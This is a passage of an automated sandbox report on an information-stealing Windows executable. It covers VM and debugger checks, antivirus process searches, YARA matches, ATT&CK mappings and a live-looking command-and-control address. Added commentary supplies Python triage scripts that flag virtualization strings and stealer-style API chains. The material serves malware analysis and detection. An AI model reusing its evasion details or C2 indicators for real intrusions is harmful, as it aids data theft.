Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual USB Mouse
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareC
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: Amcache.hve.3.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
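Two different things are mixed in the string hits above. The Amcache.hve.3.dr rows come from the analysis machine's own Amcache hive (a VMware guest, as the BiosVendor/SystemManufacturer line shows), so they describe the sandbox, not the sample. The strings found in the sample's own process memory are the ones worth chasing: "VMwareVMware" is the hypervisor vendor signature that CPUID leaf 0x40000000 returns under VMware, and "Hyper-V RAW" sits next to it in the same region; together with the cpuid call listed under HIPS / PFW below, that is consistent with a hypervisor check, although the report does not show the comparison itself. The Python below is an added example, not part of the report: a small strings extractor (ASCII and UTF-16LE, minimum six characters, like `strings -a` and `strings -el`) that tags known virtualization markers in a memory dump, run here over a constructed blob. The marker list and its descriptions are the example's own.

```python
import re

# Virtualization markers seen in this report (the example's own list; extend
# it per environment). Descriptions are the example's, not the report's.
VM_MARKERS = [
    ("VMwareVMware", "CPUID leaf 0x40000000 hypervisor vendor signature (VMware)"),
    ("Microsoft Hv", "CPUID hypervisor vendor signature (Hyper-V)"),
    ("VMware, Inc.", "SMBIOS BIOS/system vendor string"),
    ("vmci.sys", "VMware VMCI bus driver file name"),
    ("VMware Virtual disk", "virtual disk device model"),
    ("VMware Virtual USB Mouse", "virtual input device name"),
    ("Hyper-V", "Hyper-V product string"),
]

# Printable runs of at least six characters, ASCII and UTF-16LE.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
UTF16LE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def extract_strings(blob: bytes):
    """Yield (offset, encoding, text) for every ASCII and UTF-16LE string in blob."""
    for m in ASCII_RUN.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16LE_RUN.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16-le")


def find_vm_artifacts(blob: bytes):
    """Tag extracted strings that contain a known virtualization marker.

    Matching is case-insensitive and substring-based so that a marker with
    trailing garbage (the report's "VMwareVMwareC") or inside a path
    ("...\\drivers\\vmci.sys") is still caught."""
    hits = []
    for offset, encoding, text in extract_strings(blob):
        for marker, why in VM_MARKERS:
            if marker.lower() in text.lower():
                hits.append({"offset": offset, "encoding": encoding,
                             "string": text, "marker": marker, "why": why})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed stand-in for a process memory dump: two markers in ASCII (one with
# a stray trailing byte, as in the report), one in UTF-16LE, some binary noise
# and a benign string that must not match.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"VMwareVMwareC\x00"
    + bytes(range(0x80, 0xA0))
    + "Hyper-V RAW".encode("utf-16-le") + b"\x00\x00"
    + b"C:\\Windows\\System32\\drivers\\vmci.sys\x00"
    + b"Hello, World\x00"
)

if __name__ == "__main__":
    for h in find_vm_artifacts(SAMPLE_DUMP):
        print(f"0x{h['offset']:06x} {h['encoding']:<8} {h['string']!r:<45} {h['why']}")
```

Feed it the .sdmp region the report names (0x9BE000 in process 0) rather than the Amcache hive, and compare the hits against the cpuid and GetSystemInfo call sites to see which strings the code actually compares against.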
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | API call chain: ExitProcess graph end node (graph_0-44667)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | API call chain: ExitProcess graph end node (graph_0-44670)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | API call chain: ExitProcess graph end node (graph_0-44688)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | API call chain: ExitProcess graph end node (graph_0-44681)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | API call chain: ExitProcess graph end node (graph_0-44687)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | API call chain: ExitProcess graph end node (graph_0-44710)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | API call chain: ExitProcess graph end node (graph_0-44509)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | API call chain: ExitProcess graph end node (graph_0-44555)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h] 0_2_00419AA0
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00840083 push dword ptr fs:[00000030h] 0_2_00840083
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245092B mov eax, dword ptr fs:[00000030h] 0_2_0245092B
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02469D07 mov eax, dword ptr fs:[00000030h] 0_2_02469D07
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02450D90 mov eax, dword ptr fs:[00000030h] 0_2_02450D90
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0041D21A SetUnhandledExceptionFilter,0_2_0041D21A
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B63A
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0246B2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0246B2BF
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0246D481 SetUnhandledExceptionFilter,0_2_0246D481
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0246B8A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0246B8A1
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Memory protected: page guard

                      HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: XJQkTVvJ3I.exe PID: 6588, type: MEMORYSTR
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004198E0
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419790
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02469B47 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_02469B47
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_024699F7 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_024699F7
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02496A0F cpuid 0_2_02496A0F
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417D20
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_02467F87
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00418CF0 GetSystemTime,0_2_00418CF0
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417BC0
Source: Amcache.hve.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: MsMpEng.exe
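The four Code function rows above and the FindFirstFileA/CopyFileA/DeleteFileA loops listed under Malware Analysis System Evasion are the two halves of a stealer: a directory walk that compares names, copies matching files out and deletes the copy, and a Toolhelp32 walk that compares process names and, in one of the two variants, opens and terminates the match (the report's "Searches for specific processes" and "AV process strings found" signatures). Each chain is listed twice, at 0x0041xxxx and again at 0x0245xxxx/0x0246xxxx, because the unpacked code also exists in a second memory region. The Python below is an added example, not the report's or the sample's code: it parses rows in the report's own Code function format and tags each function by the ordered API subsequence it contains, so this triage can be run over the whole signature list instead of by eye. The rows embedded in it are copied from this report except the last, which is constructed to stand in for the very long GetProcAddress chain; the pattern names and the GetProcAddress threshold are the example's own.

```python
import re
from collections import Counter

# One row of the report: "Code function: <id> <api>,<api>,...,<id>"; the leading
# id is absent on some rows, the trailing one is always present.
ROW = re.compile(r"Code function:\s*(?:(?P<lead>\d+_\d+_[0-9A-Fa-f]+)\s+)?"
                 r"(?P<chain>.*?),?\s*(?P<fn>\d+_\d+_[0-9A-Fa-f]{8})\s*$")

# Ordered API subsequences (not necessarily adjacent) and the behaviour each
# one indicates. Pattern names are the example's own.
PATTERNS = [
    ("file-copy-loop", ["FindFirstFileA", "CopyFileA", "FindNextFileA"]),
    ("directory-enumeration", ["FindFirstFileA", "FindNextFileA"]),
    ("process-kill-by-name", ["CreateToolhelp32Snapshot", "Process32Next",
                              "OpenProcess", "TerminateProcess"]),
    ("process-search-by-name", ["CreateToolhelp32Snapshot", "Process32Next", "StrCmpCA"]),
]
# A weaker pattern is implied by a stronger one and is dropped when both match.
IMPLIED = {"directory-enumeration": "file-copy-loop",
           "process-search-by-name": "process-kill-by-name"}


def parse_row(line: str):
    """Return (function id, [api, ...]) for a Code function row, else None."""
    m = ROW.search(line)
    if not m:
        return None
    # Tokens may carry arguments ("VirtualProtect ?"); keep the API name only.
    tokens = [t.strip().split()[0] for t in m.group("chain").split(",") if t.strip()]
    return m.group("fn"), tokens


def has_subsequence(tokens, pattern) -> bool:
    """True if every element of pattern occurs in tokens in that order."""
    it = iter(tokens)
    return all(any(tok == want for tok in it) for want in pattern)


def classify(tokens) -> set:
    tags = {name for name, pattern in PATTERNS if has_subsequence(tokens, pattern)}
    tags -= {weak for weak, strong in IMPLIED.items() if strong in tags}
    counts = Counter(tokens)
    # Many GetProcAddress calls alongside LoadLibraryA: imports resolved at run time.
    if counts["GetProcAddress"] >= 10 and counts["LoadLibraryA"]:
        tags.add("dynamic-import-resolution")
    return tags


def summarize(lines):
    """Map each function id to its behaviour tags; duplicate rows collapse."""
    result = {}
    for line in lines:
        parsed = parse_row(line)
        if parsed:
            fn, tokens = parsed
            result[fn] = classify(tokens)
    return result


# Rows copied from this report, plus one constructed row standing in for the
# very long GetProcAddress chain at 0_2_00419F20.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe Code function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004198E0",
    r"Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe Code function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419790",
    r"Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530",
    r"Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710",
    r"Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe Code function: 0_2_00419F20 "
    + ",".join(["GetProcAddress"] * 12) + ",LoadLibraryA,LoadLibraryA,0_2_00419F20",
]

if __name__ == "__main__":
    for fn, tags in summarize(SAMPLE_ROWS).items():
        print(fn, ", ".join(sorted(tags)) or "-")
```

Subsequence rather than adjacency matching is deliberate: the report's rows interleave StrCmpCA, lstrcatA and wsprintfA between the calls that matter, and the same loop appears with and without the DeleteFileA step.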

                      Stealing of Sensitive Information

Source: Yara match | File source: 0.2.XJQkTVvJ3I.exe.2450e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XJQkTVvJ3I.exe.2450e67.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.XJQkTVvJ3I.exe.2530000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.XJQkTVvJ3I.exe.2530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XJQkTVvJ3I.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: XJQkTVvJ3I.exe PID: 6588, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                      Remote Access Functionality

Source: Yara match | File source: 0.2.XJQkTVvJ3I.exe.2450e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XJQkTVvJ3I.exe.2450e67.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.XJQkTVvJ3I.exe.2530000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.XJQkTVvJ3I.exe.2530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XJQkTVvJ3I.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: XJQkTVvJ3I.exe PID: 6588, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (12) | Create Account (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Security Software Discovery (31) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (11) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (22) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (133) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Source | Detection | Scanner | Label | Link
                      XJQkTVvJ3I.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
                      XJQkTVvJ3I.exe | 100% | Avira | HEUR/AGEN.1306978 |
                      XJQkTVvJ3I.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      http://upx.sf.net | 0% | URL Reputation | safe |
                      https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                      No contacted domains info
                      Name | Malicious | Antivirus Detection | Reputation
                      http://185.235.128.16/ | true | | unknown
                      http://185.235.128.16/562c1eb14955c897.php | true | | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://185.235.128.16 | XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                      http://185.235.128.16/562c1eb14955c897.php~M | XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      http://185.235.128.16/562c1eb14955c897.phpk | XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      http://upx.sf.net | Amcache.hve.3.dr | false | URL Reputation: safe | unknown
                      http://185.235.128.16/562c1eb14955c897.phpx | XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      http://185.235.128.16/562c1eb14955c897.php4 | XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      http://185.235.128.16/562c1eb14955c897.phpQ | XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      http://185.235.128.16/ws | XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      http://185.235.128.16e | XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                      https://docs.rs/getrandom#nodejs-es-module-support | XJQkTVvJ3I.exe, XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
                                           IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                           185.235.128.16 | unknown | Ukraine | | 204601 | ON-LINE-DATAServerlocation-NetherlandsDrontenNL | true
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1546474
                                          Start date and time:2024-11-01 00:26:07 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 4m 37s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                           Number of new started processes analysed:9
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:XJQkTVvJ3I.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:85bb8945ac7b0a1ceeb1f3783168b6ea.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@2/5@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 23
                                          • Number of non-executed functions: 198
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                          • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                           • Not all processes were analyzed, report is missing behavior information
                                          • VT rate limit hit for: XJQkTVvJ3I.exe
                                           Time | Type | Description
                                           19:27:23 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                           Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                           185.235.128.16 | WGo3ga1AL9.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.235.128.16/562c1eb14955c897.php
                                           No context
                                           Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | WGo3ga1AL9.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.235.128.16
                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | I43xo3KKfS.exe | Get hash | malicious | Stealc | Browse | 45.88.105.105
                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | Ky4J8k89A7.exe | Get hash | malicious | Stealc, Vidar, Xmrig | Browse | 45.88.105.105
                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | b4s45TboUL.exe | Get hash | malicious | Stealc, Vidar | Browse | 45.91.200.39
                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | qPNf2kJgzI.exe | Get hash | malicious | Stealc | Browse | 45.91.200.39
                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | tdnPqG0jmS.exe | Get hash | malicious | Stealc, Vidar | Browse | 45.91.200.39
                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | y3c6AzPbtt.exe | Get hash | malicious | Stealc | Browse | 45.88.105.194
                                           ON-LINE-DATAServerlocation-NetherlandsDrontenNL | kj5la5X8gv.exe | Get hash | malicious | Stealc | Browse | 45.88.105.194
